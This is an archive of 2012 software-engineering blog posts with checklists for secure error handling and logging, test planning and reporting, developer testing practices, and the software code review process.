• Catch all possible errors / failures  and handle gracefully to avoid DoS.
• Appropriate privilege level is restored in case of error / failure e.g. invalidate the session
Security mechanism is still working in case of error / exceptions / DoS attack
• Release resources (e.g. file, database pool) in case of error to prevent DoS.
• Centralized error handling.

Logging

• Log and monitor sensitive operations (e.g. create user, transfer money).
Protect log files / other files (e.g. history) which can be useful for forensic investigation using ACL, use signature if necessary.
No sensitive information (e.g. password) in the log, check the regulations (e.g. SOX in the US, WBP in the Netherlands).
• Information in log: userID, action/event, date/time (normalized to one time zone), IP address.
Throttling the log to prevent DoS or  evidence removal using log file rotation.
• Centralized logging and standardized the logging information.
• Audit logging regularly to detect malicious attempts using an automatic alert system. What information need to observe signs of malicious activities? e.g. number of connections per requester IP address.
• Validate and sanitize if you log the input (GUI form input, web service request,  or external database).
•  In case of attack what trail of forensic evidence is needed (e.g. IP address of the attack messages).
Know your baseline (typical log file growth in normal operation), plan log backup/removal and log rotation accordingly.


Please share your comment.

Source: Steve's blog http://soa-java.blogspot.com


References:


• Hacking Exposed Web Applications by Scambray et.al.


• How to break web software by Andrews & Whittaker

• OWASP Code Review Guide
• Improving Web Services Security (Microsoft patterns & practices) by Meier et.al
• XSD restrictions http://www.w3schools.com/schema/schema_facets.asp
• ISO 27001, ISO 27002

Monday, September 10, 2012

Test Checklists



Notes:
• This is a continuation from the blog about Development Test http://soa-java.blogspot.nl/2012/09/development-test.html
• For these checklist items sometime I use questions instead of mandatory compliance checks (e.g. "how to setup test data" instead of "checklist: test data should always via database"). The goal of the checklist is to instigate our mind to be aware to certain issues, not to force to a specific/narrow solution. The "best" choice is depend on the project context (e.g. test goal, security environment, etc.).
• The symbol "»" in the begining of the line means that the item is relatively important.

Test Plan template

• Datum, version, test objectives & scopes  (e.g. functional requirements acceptance test, security penetration system test, performance unit test)
• Process definitions (can be defined in the dev-team level, so don't have to be written in each test plans): metrics (e.g. #bugs & severity), defect classification, exit criteria, defect management, defect reporting (e.g. Trac), deliverables (e.g. test case library), if review or approval is needed for this test plan (e.g. test manager, clients).
• Assumptions (e.g. firewall and server configurations mimic the production environment)
Pre-condition for the whole test cases e.g. licenses for software, database production is cloned in the LabManager/virtual machine test environment
• » For each test cases:
     o Test case name and short description
     o Traceability  with requirement/usecase docs (i.e. the requirement ID)
     o Preconditions for this test case (e.g. certain data states in the database, certain inputs from mock web services)
     o Test steps and inter-dependencies with other test cases: e.g. fill-in employees' salaries steps: ....., dependency:  add new employees (test case#1)
     o Input data e.g. birth date 31-2-1980 (which is an incorrect datum)
     o Expected results
     o Part of system (e.g. GUI/presentation tier)
     o Area (e.g. security, functional, performance)
     o Test method (e.g. manual, unit test)
     o Priority / risk / test effort / test coverage (e.g. high, low)
• » Resources:
     o roles, who will build/execute the tests and how many man-hours needed (including external resources & trainings needed due to skills-gap)
     o server/database/software/tools/hardware needed
• Schedule/plan

Test Report template

• » Test date, version, tester name, artifact (which jar, svn revision), test environment (which server/LabManager), test code version (svn rev)
• » Test objectives & scopes  (e.g. functional requirements acceptance test, security penetration system test, performance unit test
• »  For each test result:
     • Test result ID number
     • Traceability (test case ID number in the test plan, requirement ID number in the requirement docs)
     • Expected result e.g. web service respond time below 2 seconds (average) and 5 seconds (max).
     • Actual result and impact, e.g. result: the web service respond time is 90 seconds, impact: the user waiting time with GUI is 2 minutes (unacceptable according to the SLA)
     • Status:
          • Ok/green: tested ok
          • Bug/red(high priority)/yellow(low priority): defects, a ticket has to be made in bugzilla/trac (with priority level & targeted version/milestone)
          • No-bug/gray: won't fix, false-positive
          • Hasn't been tested/white
     • Follow-up actions (e.g. reworks by developers)

     • Part of system (e.g. GUI/presentation tier)
     • Area (e.g. security, functional, performance)
     • Priority / risk  (e.g. high, low)
 • Root causes analysis and recommendations e.g. excessive bugs in authentication classes, root causes: inadequate knowledge, recommendation: training, code review.
• Resources (roles, planned & actual man-hours)
• List non-testable requirements e.g. the GUI should be beautiful.

Weekly Status report

Please see http://soa-java.blogspot.nl/2012/09/weekly-status-report-template.html

Test data

• » How to setup test input data (e.g. via database copy or DDL-DML database scripts) each time we setup a new Labmanager/test environment.
• » Make test cases for: too little data (e.g. empty input, null), too much data, invalid data (wrong format, out of range), boundary cases
• » Make sure the positive cases have correct data (e.g. validated according to xml schema, LDAP attributes & tree structures are correct)
• » How to mask sensitive test data (e.g. password, bank account)
• » How realistic the data are?
• How to collect / create test input data (e.g. sampling the actual traffic from jms topic or populate fake customers data using pl/sql).
• How to recover/reinitialized data after test (to fullfill the precondition for the next test)
• How to maintain / versioned test data (i.e. test data for current version and for the next software version)
• How to collect and save the test result data if needed (for further test or analysis)

Functional & Design

• » Test that the product correctly implements (every) requirements and use-cases (including alternative use-cases)
• » The product works according to the design and its assumptions (e.g. deployment environment, security environment, performance loads)
• » Test the conformance to relevant standards: the company standard/guideline as well as common standard such as Sarbanes-Oxley (US) / WBP (Netherlands)
• Test that (every) functions give correct result ( including rounding-error for numerical functions)
• Test that (every) application logics (e.g. flow control, business rules)

Performance test

• » Find out the typical data traffic (size, frequency, format) & number of users/connections in the production
• » Response time (UI, webservice) / throughput (web service, database) meet the requirements/SLA.
• » Load test: at what load the performance degrades or fails
• » Stress test: running the system for long time under realistic high loads while monitoring  resource utilization( CPU/memory/storage/network) e.g. to check memory leak, unclosed connections,tune timeout, tune thread pools.
• In case of unacceptable performance: profiling the system parts that affect the performance (e.g. database, queue/messaging, file storage, networks).
• Scale out (capacity planning for future) e.g. 3x today peak usage
• Test the time to complete of offline operation (e.g. OLAP/ETL bulk scheduled every night). Is the processing time is scallable? What to do if the bulk operation doesn't finish yet at 8.00/working hours?
 Rerun the performance test periodically in case of changes in usage patterns (e.g. growing number of users), change configurations, addition of new modules /services. So we can plan the capacity ahead and prevent the problems before it happens.

Realibility test

• Test (every) fault possibilities, test behaviour & error messages when an exception/failure occurs (e.g. simulate network failure or url-endpoint connection error in the configuration plan)
• Test that faults don't compromise the data integrity (e.g. compensation, rollback the transaction) and security. Data loss should be prevented whenever possible.
• Test failover mechanism, check the data integrity after failover.


Environment/compatibility test:

• » Tests for different browser (for UI projects), application servers (e.g. vendor, version), database (e.g. vendor, version), hardware (memory, cpu, networks), OS (& version)
• » Tests for different encoding (e.g. UTF-8 中文), different time-zone, different locales (currencies, language, format) e.g. 2,30 euro vs $ 2.30, test conversion between different components (e.g. database and LDAP servers can have different date format).
• » Test file system permissions using different process owner (e.g. generate files with oracle-user & consume the files with weblogic-user during applications integration)
• » Test if the configuration files (e.g. deployment plan, web.xml, log4j-config.xml) work
• Integration test: the connections between components (e.g. the endpoints in the configuration plan)
• Install & uninstall, deployment documentation

GUI

• » All GUI messages (including error messages) are clear/understandable by end users and match with user terminologies
• » How frequent are the errors? how the system reacts to user error (e.g. invalid input, invalid workflow)? how the users recover from errors?
• All navigations/menu/links are correct
• Check whether all GUI components (menu/commands/buttons) described in the user instructions are exists
• The fonts are readble
• The GUI consistent is with user environment (e.g. web style in your organization)
• The software state is visible to the users (e.g. waiting for the backend response, error state, waiting user input/action)
• Validate de (X)HTML, CSS: Doctype, syntax/structuur valid
• Another GUI testing checklists: http://www.sitepoint.com/ultimate-testing-checklist/

Tips for organizing usability test

• Identified the test subjects
• Provide a simple test guideline & result questionnaire, beware that your test subjects may be not so technical
• Is the software intuitive, easy to use, how much training is needed when you roll out this product in the production?
• Is online help or reference to user documentation available? User documentations should be complete enough and easy to understand for the intended audience
• Attend at least one test as test participant

Coding

• Test that variables are correctly initialized
• Test multi-threading scenarios (race condition, deadlock)

Tools selection

• do any team member already have experiences with this tool
• how easy to use
• customer review, popularity, how active the discussion groups/blogs to learn
 maturity
 support
• how active the development
• memory, processor requirement
 price/open-source
• easy to install/configure
• functionality, does this tool meet the requirement of the company tests
• demo/try before buy

Security

• Authentication: login, logout, guest, password strength
• Authorisation: permissions, admin functions,
• Data overflow, huge input attack/DOS
  For more complete security checklists see http://soa-java.blogspot.nl/2012/09/security-checklists.html


Source: Steve's blogs http://soa-java.blogspot.com/

Any comments are welcome :)




References:

• Software Testing and Continuous Quality Improvement by Lewis



• Code complete by McConnell


 • Department Of Health And Human Services, Enterprise Performance Life Cycle Framework, Checklist.

Development Test

Since I am involved in the design/code/test review team at my work, I want to share some knowledge with you in this blog.


Scope

This document discusses the development test (test the code by developers before sending the artifacts to the QA/test team).


Benefits of developer testing

• Reduce bug fix costs by detecting the defects earlier before the code is delivered to QA/Test team.
• Early and frequent development tests give early feedbacks to the developer team.
• The statistics and the trend charts can be useful for the management team to assess the maturity/reliability of the product and if early actions are necessary to correct the process. For example it would be late when you found that you need to hire a security expert if you have sent the product to the external party with security bugs on it. The QA manager can use the test statistics to decide whether or not to accept the product from the development team.


Define the process

• Determine how the developer do the test in the software process, e.g.
   o build the test before the developer start coding (TDD/agile),
   o run the test after the code is mature enough before delivery to the test team (waterfall)
   o perform automatic continous integration test after every SCM commit (Agile)
   o perform exploratory tests (Agile)
   o scrum demo / user test for user feedback at the end of each Sprint (Agile)
   o spiral/incremental test: run the test iteratively, add new tests for the integration of new SOA components (while keep running the previous tests as regression test) at each Scrum sprint
• Do you need a test plan / documented test cases?
• Does the test plan need to be review (e.g. completeness)?
• Define the process/how tests will be conducted e.g. automatic test (unit test, GUI Selenium), manual user test, manual exploratory tests?
• Determine entry criteria (e.g. code is mature enough)
• Determine exit criteria (e.g. approval by developer manager, approval by QA manager that the code is mature enough to be delivered to the QA/test team)
• Determine metrics (e.g. error list with severity & type)
• Are tools available to assist test process (e.g. SOAPUI test, yslow)?
• Determine defect reporting/communication channel: how to report test results (e.g. Trac, bugzilla), how to archive test cases & results (e.g. svn, wiki), defect management (e.g. how to track the test status, reworks en retesting)
• Determine who will play the tester role. You may have several testers assigned to specific areas (e.g. security developer specialist for penetration testing, or invite customers for use cases testing).
• Determine the time needed to develop and perform tests. Discuss the time/plan with project manager / team lead to obtain management support. Schedule the meetings. Set time-limits.
• Do the tests, register the anomalies.
• Discuss whether or not a fix is needed.
• Discuss the fix, decide which version the fix should be done, who will do the reworks, estimate/plan the reworks
• Determine the exit decision e.g. re-inspection after required reworks, minor reworks with no further verification needed.
• Reschedule the follow up/ reinspection for reworks.
• Collect "lessons to learn" to improve the development process.
• Do you need permission or need to inform other department? (e.g. you'd better seek permission from the infrastructure-manager before bombing the servers with DoS penetration test or performance stress testing). This is also in the case of the red-team  testers (which perform penetration test without pre-knowledge about the system and without IT staffs awareness), always seek the permission from the management first.


Best practices

• Test is performed not by the developer who implements the code: to avoid blind spots, objective, to make sure good documentation.
• Determine how to share the test codes with other developers & the QA team (for code reuse and reproducible results). Reuse tests with test libraries / knowledge repository (e.g. test case library). Use version control (e.g. svn)
Regression test: rerun the past tests to detect if the current fix has introduced new bugs
Automatic tests is better than manual test: repeatable, less error-prone, more efficient to run and reuse, can be run frequently (e.g. continous integration)
• Discuss with your client / user for realistic scenarios when defining the test data
• Find-out the typical use (e.g. the average message size, how many requests per minute) by asking the users
• Find-out the typical failures in the production (e.g. network outage) by asking the production-team
• Find out the typical environment/configuration in the production (e.g. browser, OS). Do you need to consider old environtment/data for back compatibility (e.g. IE 5.0) ?
• Build a test case for every requirement / use case items. Mention the requirement number in the test case document for traceability.
• Determine which tests to be perform within limited time e.g. installation/configuration/uninstall test, user functional test, performance test, security test, compatibility test.
Don’t try to cover everything. Prioritize the test cases base on the most likely error (e.g. which functional area, which class) and the risk.
Avoid overlap of test cases
• Use test case with hand-convenient values (e.g. 10000 instead of 47921)
• Make sure that the testers have business knowledge about the domain (e.g. terminologies, business logics, workflow, typical inputs)
• Consider automatic test case generator
 Review and test the test code
• GUI prototyping/pilot test: involve only limited numbers of testers & use easier scenarios
• Consider positive (e.g. good data) as well as negative (e.g. wrong data, database connection failure) test cases
• Use test framework/tools (avoid reinventing the wheel) e.g. SOAPUI, Selenium, JMeter.
• Keep, interpret and report the test statistics, useful charts:
   o defect gap analysis: found bugs and solved bugs vs time
   o number of bugs per function/module/area (bugs tend to be concentrated in certain modules)
   o number of bugs per severity level (e.g. critical, major, minor)
   o number of bugs per status (e.g. ok, solved, unsolved, not yet tested)
   o test burnout graph: number of unsolved bugs and not yet being ran test-cases vs time
   o number of bugs per root causes (e.g. incomplete requirement, database data/structure, etc).


Test checklists

Please see http://soa-java.blogspot.nl/2012/09/test-checklists.html


The test pyramid

• Level 1: automatic unit tests
• Level 2: service integration tests (e.g. the connection between services)
• Level 3: user acceptance / system tests (e.g. GUI, security, performance)


Tools

• Unit tests: junit, nunit
• Service functional tests e.g. SOAPUI
• Performance tests e.g. SOAP UI, Jmeter, yslow (GUI)
• Security tests e.g. SOAPUI, paros, spike, wireshark
• GUI tests e.g. Selenium, httpunit




Please share your comment.

Source: Steve's blog http://soa-java.blogspot.com


References:

• Software Testing and Continuous Quality Improvement by Lewis



• Code complete by McConnell


Thursday, April 26, 2012

Software Review


Since I am involved in the software review & guideline team at my work, I've spent sometime to study about review process, which I want to share with you in this blog.

The benefits of software review:
• Increase software quality, reduce bugs.
• Opportunities to learn (for both the code authors and the reviewers), as a mean for knowledge transfer to junior developers.
• To foster communication between developers.
• Various study showed that review process save costs (e.g. $21 million reported by HP). It's cheaper to fix the bugs in the earlier phases (design, development) than in the later phases (QA/test phase, shipped products)
• As a part of best practices/standard e.g. PSP, CMMI3.
• Motivate the developers to improve their code quality in order to avoid "bad scores" during review. This ego-effect still works even when the random-review covers only 30% of the total codes

The disadvantages of review:
• Cost time. Solution: limit time (e.g. max 1-2 hours)
• Developers have to wait for the reviewers, might create delay in the pipeline. Solution: the project manager has to include software review process in the plan including the time & resources (the reviewers for review, the developers for rework).
• The code author feels hurt when someone else points their mistakes. Solutions: be sensitive/friendly when discussing the findings, both the reviewers & authors agree on the positive benefits, the reviewers give also positive feedbacks to the authors, focus on the codes not the authors.
• The developers think that they have better things to do. Solution: support from the management (e.g. enforce the review process formally).





An example of a review process, which is consisting of 3 steps:
1. "Over the shoulder" short session (30min)
The author guide the reviewer through the code: the entry point, most important classes and the relationships between them. He also explains the flow, sequence & concurrency mechanism and the patterns/algorithms used. This session is similar to a pair programming session. However we need to aware of the disadvantages of this method:
• the author has too much control with the scope & pace of the review.
• The reviewer has barely time to check properly.
• The reviewer tends to condone the mistakes after hearing the authors explanations.
That's why we need to keep this session short and follow this session with a private-review session.

2. Private-review (30-90min)
Without involvement of the author, the reviewers check out the code from SCM (e.g. svn), check some documentations (usecase, specs, design), do fast sanity check, perform some test/validation (e.g. soapui), check against checklists & specifications, and read some parts of the codes.

3. Past review activities:
• The reviewer discussing the findings with the author (30 min)
• consult with the product owner, architect, team-lead, project-manager regarding the risks, bug priorities & reworking impact for the plan
• create bug tickets in the trac/bugzilla
• make an appointment for follow up





Some best practices:

Determine the scope / part of the project for review, based on: risk analysis and author's error log, e.g. Based on his personal log, Bob (the author) knew that he often made mistakes with web security, so he advised Alice (the reviewer) to concentrate to the security issues of his web codes.

To improve the process, you need to define metrics in order to measure the effect of the changes. These metrics can be external (e.g. #bugs reported by QA team, #customer tickets) or internal (e.g. #bugs found, time spent, loc, defect density, complexity measure). Based on the #bugs found by 2 reviewers, you can guess the estimated total bugs and review yield.

Checklist is the most efficient tool for reviewer. The checklist should be short (less than one A4) and describe the reasons, risk level (based on damage/impact, popularity, simplicity to perform), references for further information.

Perform self-review using personal checklists (since everybody has a unique tendency for certain mistakes).

Take advantage of automatic tests (e.g. checkstyle, findbugs, pmd in java). Some companies include these tests in their continuous integration test and their metrics then can be showed in a graph to highlight the quality trend (e.g. bug reduction vs sprint cycles).

Review meeting is not the most effective way to review. It costs more man-hours. It's better for the reviewer to be alone concentrating reading the code.

Maintain reviewer's concentration by limiting the time for each review (max 1.5 hour, 400 loc (line of code)/review). Slowing down to read the code carefully (max 500 loc/review).

Having the code authors annotate the code appropriately (e.g. the patterns/algorithms used: visitor pattern, quick sort, etc.).

The code authors provide notes for his/her project: starting point/files to begin, important classes, dependency/class diagram, patterns used, where to find the documentations (use case, specs, design doc, installation guide), test cases (e.g. web service request-response examples). This information is useful not only for the reviewers but also in case the author leaves the company (e.g. a temporary external consultant). You can use a trac/wiki as a collection point for the information.

Verify/follow up if the bugs is really fixed.

Beware not to compare orange with apple: the #bugs found in a code is not only depend on the developer expertise but also:
• how complex the problem is
• how many reviewers, time spent, their expertises
• specification & code maturity (development version, beta version, shipped product)
• programming languages
• tools (IDE, validator, etc)

Review-team lead / process owner responsibilities:
• maintain expert knowledge of the reviewers, arrange trainings if necessary
• establish and enforce review policies
• lead the writing and implementation of the review process and action plans
• define the metrics, make sure that they're collected and used
• monitor the review practices and evaluate their effectiveness

Process assets:
• process description
• guidelines & checklists
• issues tracking system e.g. trac/bugzilla

Where to do the review in a typical software process:



To be continued: http://soa-java.blogspot.nl/2012/09/the-review-process.html


Source: Steve's blogs http://soa-java.blogspot.com/

Any comments are welcome :)




Literatures:

11 Best Practices for Peer Code Review
http://support.smartbear.com/resources/cc/11_Best_Practices_for_Peer_Code_Review.pdf

Best Kept Secrets of Peer Code Review by Jason Cohen
Plus: recently new, supported by scientific analysis of literature & field studies, down to earth advices (instead of management jargons high in the clouds). minus: repetitive advertisements for their review-tools.


Peer Reviews in Software: A Practical Guide
by Karl Wiegers (Paperback)



Seven Truths About Peer Reviews by Karl E. Wiegers
http://www.processimpact.com/articles/seven_truths.html

OWASP code review guide
https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf